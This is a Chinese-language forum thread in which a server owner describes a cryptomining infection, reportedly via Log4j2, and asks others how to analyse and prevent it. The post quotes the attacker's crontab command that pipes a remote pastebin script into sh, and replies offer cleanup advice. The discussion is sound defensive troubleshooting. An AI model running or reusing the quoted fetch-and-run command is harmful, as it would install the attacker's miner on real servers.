V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
callmebigfaceman
V2EX  ›  Linux

服务器被挖矿,找到相关文件及计划任务, google 过关键词得知是 Log4j2 漏洞导致被入侵,想知道该病毒运行的逻辑,找不到相关 sh 文件,求大佬指点。

  •  
  •   callmebigfaceman · 2022-04-06 17:07:22 +08:00 · 3514 次点击
    这是一个创建于 962 天前的主题,其中的信息可能已经有所发展或是发生改变。

    环境介绍: 1 、redhat 6.3 2 、对外开启了 9000:80 端口的映射 3 、强密码验证(限制指定 IP 通过 ssh 连接)

    已知信息: 1 、crontab -l 得知被添加了计划任务:curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh (我尝试得到该脚本,但是请求出来只是字符串‘#endif’,我该如何得到该病毒脚本? top 查看进程时候有看到 /tmp/.mimu/apache.sh ,但是实际去查看该病毒目录,并没有发现脚本,是否加载在内存中,实际脚本已被删除?) https://imgur.com/Huflmd7 https://imgur.com/2PZNjXR

    2 、已知该脚本会生成隐藏目录 /tmp/.mimu/,下面包含挖矿程序 kthmimu 及配置文件 config.json https://imgur.com/Huflmd7

    已自行尝试复现的测试: 1 、尝试 curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh ,但是我并没有发现脚本文件及复现

    求助: 1 、如何找出该脚本及实现逻辑? 2 、如何防范?

    15 条回复    2022-04-07 15:49:35 +08:00
    aaa5838769
        1
    aaa5838769  
       2022-04-06 17:14:42 +08:00
    你的项目是在宿主机运行还是容器内,如果是在容器内,去容器的目录下看看。
    callmebigfaceman
        2
    callmebigfaceman  
    OP
       2022-04-06 17:17:18 +08:00
    @aaa5838769 宿主机内
    Jinnyu
        3
    Jinnyu  
       2022-04-06 17:34:35 +08:00
    看样子应该是 https://pastebin.com/raw/8DdBvkRn 被访问后, 服务端删除了里边的内容,
    防止脚本内容泄露

    可以分析下 apache.sh 的脚本内容 看看都连接了哪些端口
    1. 先禁止下端口访问
    2. 通过 chattr 修改文件权限, 禁止写入 /tmp/.mimu
    3. 复查所有常用二进制文件 MD5 (cd, mv, cp, ps, ls, top 等)
    polaa
        4
    polaa  
       2022-04-06 17:56:49 +08:00
    1.检测是否存在自启动脚本
    2. 尝试恢复删除的脚本
    关键词
    recover deleted file active process
    recover deleted file
    defunct9
        5
    defunct9  
       2022-04-06 18:03:05 +08:00
    保护现场不够啊。
    defunct9
        6
    defunct9  
       2022-04-06 18:03:16 +08:00   ❤️ 6
    开 ssh ,让我上去看看
    meetcw
        7
    meetcw  
       2022-04-06 18:35:41 +08:00
    进程没关掉的话可以通过 proc/{pid}/exe 文件恢复执行文件,另外 proc/{pid}/fd 下是这个进程打开的文件。
    wd
        8
    wd  
       2022-04-06 19:19:44 +08:00 via iPhone
    别折腾了,遇到这样的一般就重建吧,你不知道对方埋了多少后门的。
    idragonet
        9
    idragonet  
       2022-04-06 20:32:52 +08:00
    今晚我的腾讯云服务器也收到服务器被挖矿警告了。
    callmebigfaceman
        10
    callmebigfaceman  
    OP
       2022-04-06 21:34:34 +08:00
    @Jinnyu 1 、2 都已做了,我仔细查查 3 ,感谢
    callmebigfaceman
        11
    callmebigfaceman  
    OP
       2022-04-06 21:35:15 +08:00
    @polaa 1.已检查自启动的相关项目 2.我尝试一下,感谢
    callmebigfaceman
        12
    callmebigfaceman  
    OP
       2022-04-06 21:35:51 +08:00
    @defunct9 现场已经被我清理过了,不是很方便提供 ssh ,不好意思。
    callmebigfaceman
        13
    callmebigfaceman  
    OP
       2022-04-06 21:41:16 +08:00
    @meetcw 被我关了,exe 是 /bin/sh
    callmebigfaceman
        14
    callmebigfaceman  
    OP
       2022-04-06 21:56:39 +08:00
    @wd 主要想了解它如何实现的
    Chaconne
        15
    Chaconne  
       2022-04-07 15:49:35 +08:00
    @idragonet 我用 GCP 从没有过,是安全性不一样?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1569 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 34ms · UTC 17:11 · PVG 01:11 · LAX 09:11 · JFK 12:11
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.